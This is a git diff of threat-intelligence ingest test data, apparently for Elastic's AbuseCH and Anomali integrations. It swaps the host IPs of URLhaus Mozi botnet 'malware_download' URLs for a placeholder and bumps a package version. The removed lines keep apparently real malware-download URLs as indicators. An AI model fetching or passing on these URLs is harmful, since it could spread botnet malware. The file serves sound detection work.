UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31825,18 +31825,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.92.159.37:46924/Mozi.m", + "original": "http://89.160.20.156:46924/Mozi.m", "scheme": "http", "port": 46924, - "domain": "113.92.159.37", - "full": "http://113.92.159.37:46924/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46924/Mozi.m" }, - "ip": "113.92.159.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694984225Z", - "original": "{\"id\":\"960893\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960893/\",\"url\":\"http://113.92.159.37:46924/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.92.159.37\",\"date_added\":\"2021-01-14 15:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029419100Z", + "original": "{\"id\":\"960893\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960893/\",\"url\":\"http://89.160.20.156:46924/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31874,18 +31874,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.195.165.157:59734/Mozi.m", + "original": "http://89.160.20.156:59734/Mozi.m", "scheme": "http", "port": 59734, - "domain": "113.195.165.157", - "full": "http://113.195.165.157:59734/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59734/Mozi.m" }, - "ip": "113.195.165.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694988684Z", - "original": "{\"id\":\"960892\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960892/\",\"url\":\"http://113.195.165.157:59734/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.195.165.157\",\"date_added\":\"2021-01-14 15:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029425700Z", + "original": "{\"id\":\"960892\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960892/\",\"url\":\"http://89.160.20.156:59734/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31923,18 +31923,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.84.240.178:51620/Mozi.m", + "original": "http://89.160.20.156:51620/Mozi.m", "scheme": "http", "port": 51620, - "domain": "103.84.240.178", - "full": "http://103.84.240.178:51620/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51620/Mozi.m" }, - "ip": "103.84.240.178" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694994144Z", - "original": "{\"id\":\"960889\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960889/\",\"url\":\"http://103.84.240.178:51620/Mozi.m\",\"url_status\":\"offline\",\"host\":\"103.84.240.178\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029432400Z", + "original": "{\"id\":\"960889\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960889/\",\"url\":\"http://89.160.20.156:51620/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31972,18 +31972,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.54.239.78:42585/Mozi.a", + "original": "http://89.160.20.156:42585/Mozi.a", "scheme": "http", "port": 42585, - "domain": "115.54.239.78", - "full": "http://115.54.239.78:42585/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42585/Mozi.a" }, - "ip": "115.54.239.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694998382Z", - "original": "{\"id\":\"960890\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960890/\",\"url\":\"http://115.54.239.78:42585/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.54.239.78\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029439Z", + "original": "{\"id\":\"960890\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960890/\",\"url\":\"http://89.160.20.156:42585/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32021,18 +32021,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.46.242.87:57941/Mozi.m", + "original": "http://89.160.20.156:57941/Mozi.m", "scheme": "http", "port": 57941, - "domain": "103.46.242.87", - "full": "http://103.46.242.87:57941/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57941/Mozi.m" }, - "ip": "103.46.242.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695002249Z", - "original": "{\"id\":\"960891\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960891/\",\"url\":\"http://103.46.242.87:57941/Mozi.m\",\"url_status\":\"offline\",\"host\":\"103.46.242.87\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029445600Z", + "original": "{\"id\":\"960891\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960891/\",\"url\":\"http://89.160.20.156:57941/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32070,18 +32070,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://115.52.17.165:38308/i", + "original": "http://89.160.20.156:38308/i", "scheme": "http", "port": 38308, - "domain": "115.52.17.165", - "full": "http://115.52.17.165:38308/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38308/i" }, - "ip": "115.52.17.165" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695006106Z", - "original": "{\"id\":\"960888\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960888/\",\"url\":\"http://115.52.17.165:38308/i\",\"url_status\":\"online\",\"host\":\"115.52.17.165\",\"date_added\":\"2021-01-14 15:32:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.029452200Z", + "original": "{\"id\":\"960888\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960888/\",\"url\":\"http://89.160.20.156:38308/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:32:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32119,18 +32119,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.227.222.174:55281/Mozi.m", + "original": "http://89.160.20.156:55281/Mozi.m", "scheme": "http", "port": 55281, - "domain": "42.227.222.174", - "full": "http://42.227.222.174:55281/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55281/Mozi.m" }, - "ip": "42.227.222.174" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695010144Z", - "original": "{\"id\":\"960887\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960887/\",\"url\":\"http://42.227.222.174:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.227.222.174\",\"date_added\":\"2021-01-14 15:22:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029458800Z", + "original": "{\"id\":\"960887\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960887/\",\"url\":\"http://89.160.20.156:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32168,18 +32168,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://42.233.232.90:57662/Mozi.a", + "original": "http://89.160.20.156:57662/Mozi.a", "scheme": "http", "port": 57662, - "domain": "42.233.232.90", - "full": "http://42.233.232.90:57662/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57662/Mozi.a" }, - "ip": "42.233.232.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695014282Z", - "original": "{\"id\":\"960886\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960886/\",\"url\":\"http://42.233.232.90:57662/Mozi.a\",\"url_status\":\"online\",\"host\":\"42.233.232.90\",\"date_added\":\"2021-01-14 15:22:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029465800Z", + "original": "{\"id\":\"960886\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960886/\",\"url\":\"http://89.160.20.156:57662/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32217,18 +32217,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.97.173.255:40738/Mozi.m", + "original": "http://89.160.20.156:40738/Mozi.m", "scheme": "http", "port": 40738, - "domain": "59.97.173.255", - "full": "http://59.97.173.255:40738/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40738/Mozi.m" }, - "ip": "59.97.173.255" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695018410Z", - "original": "{\"id\":\"960885\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960885/\",\"url\":\"http://59.97.173.255:40738/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.173.255\",\"date_added\":\"2021-01-14 15:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029472300Z", + "original": "{\"id\":\"960885\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960885/\",\"url\":\"http://89.160.20.156:40738/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32266,18 +32266,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.93.5:59018/Mozi.m", + "original": "http://89.160.20.156:59018/Mozi.m", "scheme": "http", "port": 59018, - "domain": "59.99.93.5", - "full": "http://59.99.93.5:59018/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59018/Mozi.m" }, - "ip": "59.99.93.5" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695022327Z", - "original": "{\"id\":\"960884\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960884/\",\"url\":\"http://59.99.93.5:59018/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.93.5\",\"date_added\":\"2021-01-14 15:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029478900Z", + "original": "{\"id\":\"960884\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960884/\",\"url\":\"http://89.160.20.156:59018/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32315,18 +32315,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://39.66.175.56:60279/Mozi.a", + "original": "http://89.160.20.156:60279/Mozi.a", "scheme": "http", "port": 60279, - "domain": "39.66.175.56", - "full": "http://39.66.175.56:60279/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60279/Mozi.a" }, - "ip": "39.66.175.56" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695026234Z", - "original": "{\"id\":\"960880\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960880/\",\"url\":\"http://39.66.175.56:60279/Mozi.a\",\"url_status\":\"online\",\"host\":\"39.66.175.56\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029487Z", + "original": "{\"id\":\"960880\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960880/\",\"url\":\"http://89.160.20.156:60279/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32364,18 +32364,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.216.188.167:52738/Mozi.m", + "original": "http://89.160.20.156:52738/Mozi.m", "scheme": "http", "port": 52738, - "domain": "27.216.188.167", - "full": "http://27.216.188.167:52738/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52738/Mozi.m" }, - "ip": "27.216.188.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695030813Z", - "original": "{\"id\":\"960881\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960881/\",\"url\":\"http://27.216.188.167:52738/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.216.188.167\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029494Z", + "original": "{\"id\":\"960881\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960881/\",\"url\":\"http://89.160.20.156:52738/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32413,18 +32413,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://60.212.123.142:37394/Mozi.m", + "original": "http://89.160.20.156:37394/Mozi.m", "scheme": "http", "port": 37394, - "domain": "60.212.123.142", - "full": "http://60.212.123.142:37394/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37394/Mozi.m" }, - "ip": "60.212.123.142" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695034740Z", - "original": "{\"id\":\"960882\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960882/\",\"url\":\"http://60.212.123.142:37394/Mozi.m\",\"url_status\":\"online\",\"host\":\"60.212.123.142\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029500500Z", + "original": "{\"id\":\"960882\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960882/\",\"url\":\"http://89.160.20.156:37394/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32462,18 +32462,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.22.13:56491/Mozi.m", + "original": "http://89.160.20.156:56491/Mozi.m", "scheme": "http", "port": 56491, - "domain": "58.249.22.13", - "full": "http://58.249.22.13:56491/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56491/Mozi.m" }, - "ip": "58.249.22.13" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695038678Z", - "original": "{\"id\":\"960883\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960883/\",\"url\":\"http://58.249.22.13:56491/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.22.13\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029507100Z", + "original": "{\"id\":\"960883\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960883/\",\"url\":\"http://89.160.20.156:56491/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32511,18 +32511,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.193.91.214:46067/Mozi.a", + "original": "http://89.160.20.156:46067/Mozi.a", "scheme": "http", "port": 46067, - "domain": "120.193.91.214", - "full": "http://120.193.91.214:46067/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46067/Mozi.a" }, - "ip": "120.193.91.214" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.695043246Z", - "original": "{\"id\":\"960879\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960879/\",\"url\":\"http://120.193.91.214:46067/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.193.91.214\",\"date_added\":\"2021-01-14 15:20:19 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029513800Z", + "original": "{\"id\":\"960879\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960879/\",\"url\":\"http://89.160.20.156:46067/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:20:19 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_abusech/manifest.yml b/packages/ti_abusech/manifest.yml index ca1b4faac6a..93d532f07db 100644 --- a/packages/ti_abusech/manifest.yml +++ b/packages/ti_abusech/manifest.yml @@ -1,6 +1,6 @@ name: ti_abusech title: AbuseCH -version: 1.1.2 +version: 1.1.3 release: ga description: Collect threat intelligence from AbuseCH API with Elastic Agent. type: integration 
diff --git a/packages/ti_anomali/_dev/deploy/docker/sample_logs/test-threatstream-ndjson.log b/packages/ti_anomali/_dev/deploy/docker/sample_logs/test-threatstream-ndjson.log index f47d73388fd..1e657cf1b3b 100644 --- a/packages/ti_anomali/_dev/deploy/docker/sample_logs/test-threatstream-ndjson.log +++ b/packages/ti_anomali/_dev/deploy/docker/sample_logs/test-threatstream-ndjson.log 
@@ -1,100 +1,100 @@ -{"domain": "0jp2k.example.org", "itype": "mal_domain", "classification": "public", "lat": -69, "update_id": 3414980235, "source_feed_id": 1593, "date_first": "2020-10-08T12:21:50", "confidence": 70, "severity": "medium", "trusted_circle_ids": "737,664,312", "lon": -141, "id": 2283311083, "source": "Phony generated indicator", "state": "active", "import_session_id": 647, "value_type": "domain", "srcip": "192.0.2.168", "org": "OVH Hosting", "date_last": "2020-10-08T12:24:42", "country": "FR", "detail2": "imported by user 477", "resource_uri": "/api/v1/intelligence/P19190095730/"} -{"confidence": 39, "itype": "mal_ip", "severity": "low", "classification": "private", "date_first": "2020-10-08T12:21:59", "country": "RU", "org": "IP Khnykin Vitaliy Yakovlevich", "import_session_id": 1064, "lon": -34, "lat": 37, "source": "Phony generated indicator", "state": "active", "update_id": 3330917000, "trusted_circle_ids": "568,553", "srcip": "192.0.2.182", "detail2": "imported by user 609", "value_type": "ip", "source_feed_id": 2076, "id": 2232122947, "date_last": "2020-10-08T12:24:42", "resource_uri": "/api/v1/intelligence/P19007476881/"} -{"itype": "mal_ip", "classification": "public", "lat": -35, "update_id": 1358793759, "source_feed_id": 1613, "id": 3093117579, "confidence": 27, "severity": "very-high", "trusted_circle_ids": "951,98,921", "lon": -77, "date_first": "2020-10-08T12:22:11", "source": "Phony generated indicator", "state": "active", "import_session_id": 3498, "value_type": "ip", "srcip": "203.0.113.193", "org": "Cox Communications", "asn": "22773", "date_last": "2020-10-08T12:24:42", "country": "US", "detail2": "imported by user 157", "resource_uri": "/api/v1/intelligence/P33405947429/"} -{"confidence": 35, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "407", "date_first": "2020-10-08T12:22:16", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 156", 
"import_session_id": 3166, "update_id": 2184632737, "value_type": "md5", "md5": "c0667e3cbdb8e7ed09e36cf16bbf367d270b7893dbd57a838add3f1f7d6e34f4", "source_feed_id": 1624, "id": 3304738500, "date_last": "2020-10-08T12:24:42", "resource_uri": "/api/v1/intelligence/P24670712639/"} -{"itype": "mal_ip", "classification": "private", "lat": -29, "update_id": 3124377221, "source_feed_id": 2999, "id": 1079453726, "confidence": 87, "severity": "high", "trusted_circle_ids": "715", "lon": -180, "date_first": "2020-10-08T12:28:50", "source": "Phony generated indicator", "state": "active", "import_session_id": 2660, "value_type": "ip", "srcip": "192.0.2.48", "org": "Spectrum", "asn": "20001", "date_last": "2020-10-09T18:49:37", "country": "US", "detail2": "imported by user 932", "resource_uri": "/api/v1/intelligence/P42599405560/"} -{"itype": "mal_ip", "classification": "public", "lat": 77, "update_id": 1166855074, "source_feed_id": 3644, "id": 3715444132, "confidence": 46, "severity": "medium", "trusted_circle_ids": "595", "lon": -75, "date_first": "2020-10-08T12:29:01", "source": "Phony generated indicator", "state": "active", "import_session_id": 2220, "value_type": "ip", "srcip": "203.0.113.37", "org": "Spectrum", "asn": "11351", "date_last": "2020-10-09T18:49:37", "country": "US", "detail2": "imported by user 603", "resource_uri": "/api/v1/intelligence/P48778003365/"} -{"confidence": 73, "itype": "c2_domain", "severity": "high", "classification": "private", "trusted_circle_ids": "503,657", "detail": "odq9fo2w,Botnet-YDSH5,popularity=low,type=2,first_seen=2020-12-07T06:41:19,Botnet-UD0,mask=2001:db8:eea9:58a6:63a5:aec3:ec8b:c480,popularity=high,threat=1bj91", "date_first": "2020-10-09T18:14:43", "source": "Phony generated indicator", "state": "active", "update_id": 1962510236, "date_last": "2020-10-09T18:14:43", "domain": "hrzhc.example.com", "lat": -15, "srcip": "192.0.2.6", "detail2": "imported by user 318", "value_type": "domain", "source_feed_id": 1035, "id": 
2507010269, "maltype": "malware:bv-", "resource_uri": "/api/v1/intelligence/P26654004337/"} -{"confidence": 46, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "443,955", "date_first": "2020-10-09T18:30:10", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 656", "update_id": 3128959438, "value_type": "md5", "md5": "878ecb9401114def7e4a4553f6034e7d", "source_feed_id": 2998, "id": 2460000924, "date_last": "2020-10-09T18:30:10", "resource_uri": "/api/v1/intelligence/P42412607008/"} -{"confidence": -1, "itype": "phish_url", "severity": "very-high", "classification": "public", "url": "https://llvx.example.com/6qk5f1r1v/chxi-ou?ybocaf=z5qokq", "country": "US", "date_first": "2020-10-09T18:30:13", "detail": "51i4d8-", "lat": -66, "source": "Phony generated indicator", "state": "active", "update_id": 1287220013, "date_last": "2020-10-09T18:30:13", "trusted_circle_ids": "122", "srcip": "192.0.2.214", "detail2": "imported by user 27", "value_type": "url", "source_feed_id": 2028, "id": 2202975175, "maltype": "malware:n4s4m", "resource_uri": "/api/v1/intelligence/P15177532091/"} -{"confidence": 63, "itype": "mal_url", "severity": "medium", "classification": "public", "url": "http://uyawvs.example.org/9ch5/kily?vtyrbjij=emv", "country": "CN", "date_first": "2020-10-09T18:30:13", "detail": 